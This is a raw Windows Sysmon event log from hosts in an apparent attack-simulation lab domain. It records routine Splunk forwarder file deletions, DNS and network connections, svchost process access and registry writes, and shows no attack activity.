23542300x8000000000000000980678Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:53.195{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1345388E53D1F01DF31F6D1115C76F6A,SHA256=695699304EF307D49002DFFC44317F265DAB90A5F21EC3B573EA4DC30D923AB4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980677Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:53.164{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2E763D453A8F888E62188EEEA88AD14C,SHA256=9C9D6FED86B463F1A9F15AED039203CE137CA1BAF18AA9F5FDFDB0CF67C911B3,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001054789Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:52.312{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-429.attackrange.local53domainfalse10.0.1.14win-dc-429.attackrange.local64424- 354300x80000000000000001054788Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:52.305{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-429.attackrange.local54185-false10.0.1.14win-dc-429.attackrange.local53domain 354300x80000000000000001054787Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:52.305{5EBD8912-8CC0-6151-1400-00000000FD01}1040C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcptruefalse10.0.1.14win-dc-429.attackrange.local54185-false10.0.1.14win-dc-429.attackrange.local53domain 354300x80000000000000001054786Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:52.302{5EBD8912-8CC0-6151-1400-00000000FD01}1040C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruefalse10.0.1.14win-dc-429.attackrange.local61538-false10.0.1.14win-dc-429.attackrange.local53domain 354300x80000000000000001054785Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:52.300{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local62852- 354300x80000000000000001054784Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:52.047{5EBD8912-8CDC-6151-6E00-00000000FD01}2608C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local49724-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001054783Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:53.308{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9E1BB27EC51B00A472E015F9DDDC2FE2,SHA256=78C98F3E0970B7B397174CB82630D30B20F798EEEDA631BC368ECDB417D0BAD3,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000001054782Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:53.167{5EBD8912-8CC0-6151-1500-00000000FD01}1256C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Epoch2\EpochDWORD (0x00000439) 354300x80000000000000001054781Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:51.953{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local63795- 23542300x80000000000000001054799Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:54.667{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=3DA5E4C58EEDB92FA99B79813E1E9993,SHA256=D4A27E205AA412E08F0843812EF748FDA4ED17DDBB29965BB9A3C6EFEE6D6492,IMPHASH=00000000000000000000000000000000falsetrue 22542200x80000000000000001054798Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:52.332{5EBD8912-8CD0-6151-2A00-00000000FD01}2404attackrange.local0type: 6 ;10.0.1.14;C:\Windows\System32\dns.exe 22542200x80000000000000001054797Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:52.331{5EBD8912-8CD0-6151-2A00-00000000FD01}2404attackrange.local0type: 2 win-dc-429.attackrange.local;10.0.1.14;C:\Windows\System32\dns.exe 22542200x80000000000000001054796Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:52.331{5EBD8912-8CD0-6151-2A00-00000000FD01}2404win-dc-429.attackrange.local9501type: 6 ;10.0.1.14;C:\Windows\System32\dns.exe 22542200x80000000000000001054795Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:52.330{5EBD8912-8CC0-6151-1400-00000000FD01}1040attackrange.local0type: 2 win-dc-429.attackrange.local;10.0.1.14;C:\Windows\System32\svchost.exe 22542200x80000000000000001054794Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:52.313{5EBD8912-8CC0-6151-1400-00000000FD01}1040win-dc-429.attackrange.local9501type: 6 ;10.0.1.14;C:\Windows\System32\svchost.exe 23542300x80000000000000001054793Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:54.527{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7F2B779BD10263462DB11A3144B86830,SHA256=8A380CB4DCBEDC28E5CE420BCF340E798C14A62C6A54FB48718A1B59983C88FF,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000980684Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:51.583{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.3.202.198-61151-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000980683Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:54.352{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=38BDBE3AF5399E8FB2FF7D5799555C48,SHA256=643C75634164B0AEC88149CA62932CD45FBB96AEC67A6F08589E0F9D0598E1EA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980682Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:54.164{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BA93295E4B24690E14709156C419FB1F,SHA256=B3BA053174B614188BA42EEA10AC07E65B572E49DFB9DE60AC906C6BCC368D28,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054845Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:55.949{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F46CC3AA66F13A46F686E6F9F7B856C5,SHA256=5A492633C07332D23A115DAFC9DBA5E8E3F02978236926261AB63B9BB9C09902,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980685Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:55.164{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1A54AB1E4FAB03D86FD509F7B6C1A995,SHA256=FC63E06F1D3F3E73D72DF16DE95C668DF27190B3BE3F6B654758DE69650A8BCF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001054844Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:55.652{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054843Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:55.652{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054842Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:55.652{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054841Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:55.652{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054840Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:55.652{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054839Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:55.652{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054838Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:55.652{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054837Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:55.652{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054836Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:55.652{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054835Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:55.652{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054834Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:55.652{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054833Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:55.652{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x80000000000000001054832Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:55.324{5EBD8912-8CC0-6151-1400-00000000FD01}1040C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{539531AA-0A0B-4BBA-B26E-65076530B444}\RegisteredSinceBootDWORD (0x00000001) 13241300x80000000000000001054831Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:55.324{5EBD8912-8CC0-6151-1400-00000000FD01}1040C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{539531AA-0A0B-4BBA-B26E-65076530B444}\StaleAdapterDWORD (0x00000000) 13241300x80000000000000001054830Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:55.324{5EBD8912-8CC0-6151-1400-00000000FD01}1040C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{539531AA-0A0B-4BBA-B26E-65076530B444}\CompartmentIdDWORD (0x00000001) 13241300x80000000000000001054829Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:55.324{5EBD8912-8CC0-6151-1400-00000000FD01}1040C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{539531AA-0A0B-4BBA-B26E-65076530B444}\FlagsDWORD (0x00000002) 13241300x80000000000000001054828Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:55.324{5EBD8912-8CC0-6151-1400-00000000FD01}1040C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{539531AA-0A0B-4BBA-B26E-65076530B444}\TtlDWORD (0x000004b0) 13241300x80000000000000001054827Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:55.324{5EBD8912-8CC0-6151-1400-00000000FD01}1040C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{539531AA-0A0B-4BBA-B26E-65076530B444}\SentPriUpdateToIpBinary Data 13241300x80000000000000001054826Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:55.324{5EBD8912-8CC0-6151-1400-00000000FD01}1040C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{539531AA-0A0B-4BBA-B26E-65076530B444}\SentUpdateToIpBinary Data 13241300x80000000000000001054825Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:55.324{5EBD8912-8CC0-6151-1400-00000000FD01}1040C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{539531AA-0A0B-4BBA-B26E-65076530B444}\DnsServersBinary Data 13241300x80000000000000001054824Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:55.324{5EBD8912-8CC0-6151-1400-00000000FD01}1040C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{539531AA-0A0B-4BBA-B26E-65076530B444}\HostAddrsBinary Data 13241300x80000000000000001054823Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:55.324{5EBD8912-8CC0-6151-1400-00000000FD01}1040C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{539531AA-0A0B-4BBA-B26E-65076530B444}\PrimaryDomainNameattackrange.local 13241300x80000000000000001054822Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:55.324{5EBD8912-8CC0-6151-1400-00000000FD01}1040C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{539531AA-0A0B-4BBA-B26E-65076530B444}\AdapterDomainName(Empty) 13241300x80000000000000001054821Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:55.324{5EBD8912-8CC0-6151-1400-00000000FD01}1040C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{539531AA-0A0B-4BBA-B26E-65076530B444}\Hostnamewin-dc-429 13241300x80000000000000001054820Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:55.324{5EBD8912-8CC0-6151-1400-00000000FD01}1040C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{539531AA-0A0B-4BBA-B26E-65076530B444}\RegisteredSinceBootDWORD (0x00000001) 23542300x80000000000000001054819Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:55.230{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 